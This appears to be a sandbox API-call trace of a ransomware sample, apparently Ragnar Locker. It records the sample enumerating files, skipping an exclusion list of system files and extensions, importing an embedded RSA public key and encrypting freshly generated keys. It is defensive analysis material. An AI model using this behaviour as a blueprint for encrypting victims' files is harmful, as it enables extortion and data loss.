hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf5f857bf, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.545] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0175.545] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0175.545] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5f5c04f, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf5f5c04f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.545] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0175.545] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0175.545] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.545] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0175.545] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0175.545] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.545] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0175.545] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0175.545] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.546] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0175.546] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0175.546] FindNextFileW (in: hFindFile=0x3547f80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.546] FindClose (in: hFindFile=0x3547f80 | out: hFindFile=0x3547f80) returned 1 [0175.547] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547fc0 [0175.547] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf5f857bf, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf5f857bf, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.548] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5f5c04f, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf5f5c04f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.548] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.548] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0175.548] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0175.548] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0175.549] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.549] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.549] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0175.549] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned=".rtf" [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0175.549] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0175.549] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0175.550] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0175.550] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0175.550] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0175.550] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0175.550] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0175.550] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0175.550] GetProcessHeap () returned 0x3520000 [0175.550] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0175.551] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" [0175.551] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.551] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.551] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0175.551] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned=".xml" [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0175.551] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0175.552] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0175.552] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0175.552] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0175.552] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0175.552] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0175.552] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0175.552] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0175.552] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0175.552] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0175.552] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0175.552] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0175.552] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0175.552] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0175.552] GetProcessHeap () returned 0x3520000 [0175.552] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0175.553] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" [0175.553] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.553] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.553] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0175.553] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned=".dll" [0175.553] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.553] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0175.554] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0175.554] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0175.554] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0175.554] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0175.554] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.554] GetProcessHeap () returned 0x3520000 [0175.554] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586900 [0175.554] CryptAcquireContextW (in: phProv=0x3586900, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586900*=0x5d26850) returned 1 [0175.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0175.555] GetProcessHeap () returned 0x3520000 [0175.555] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358e748 [0175.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358e748, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0175.555] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.555] GetProcessHeap () returned 0x3520000 [0175.555] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0175.555] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.555] GetProcessHeap () returned 0x3520000 [0175.555] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358e748 | out: hHeap=0x3520000) returned 1 [0175.556] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0175.556] CryptImportPublicKeyInfo (in: hCryptProv=0x5d26850, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586904 | out: phKey=0x3586904*=0x3547f80) returned 1 [0175.556] GetProcessHeap () returned 0x3520000 [0175.556] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0175.556] LocalFree (hMem=0x35948f0) returned 0x0 [0175.556] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26740) returned 1 [0175.556] CryptGenRandom (in: hProv=0x5d26740, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0175.556] CryptReleaseContext (hProv=0x5d26740, dwFlags=0x0) returned 1 [0175.557] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.563] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d269e8) returned 1 [0175.564] CryptGenRandom (in: hProv=0x5d269e8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.564] CryptReleaseContext (hProv=0x5d269e8, dwFlags=0x0) returned 1 [0175.564] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.606] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26410) returned 1 [0175.607] CryptGenRandom (in: hProv=0x5d26410, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0175.607] CryptReleaseContext (hProv=0x5d26410, dwFlags=0x0) returned 1 [0175.607] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.611] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d268d8) returned 1 [0175.612] CryptGenRandom (in: hProv=0x5d268d8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.612] CryptReleaseContext (hProv=0x5d268d8, dwFlags=0x0) returned 1 [0175.612] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.615] CryptEncrypt (in: hKey=0x3547f80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.616] GetLastError () returned 0x80090016 [0175.616] CryptEncrypt (in: hKey=0x3547f80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.616] GetLastError () returned 0x80090016 [0175.616] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x13c4) returned 0x3f0 [0175.617] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26fc0) returned 1 [0175.618] CryptGenRandom (in: hProv=0x5d26fc0, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0175.618] CryptReleaseContext (hProv=0x5d26fc0, dwFlags=0x0) returned 1 [0175.618] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.620] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d265a8) returned 1 [0175.621] CryptGenRandom (in: hProv=0x5d265a8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.621] CryptReleaseContext (hProv=0x5d265a8, dwFlags=0x0) returned 1 [0175.621] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.623] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26740) returned 1 [0175.624] CryptGenRandom (in: hProv=0x5d26740, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0175.624] CryptReleaseContext (hProv=0x5d26740, dwFlags=0x0) returned 1 [0175.624] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.626] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26af8) returned 1 [0175.627] CryptGenRandom (in: hProv=0x5d26af8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.627] CryptReleaseContext (hProv=0x5d26af8, dwFlags=0x0) returned 1 [0175.627] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.629] CryptEncrypt (in: hKey=0x3547f80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.630] GetLastError () returned 0x80090016 [0175.630] CryptEncrypt (in: hKey=0x3547f80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.630] 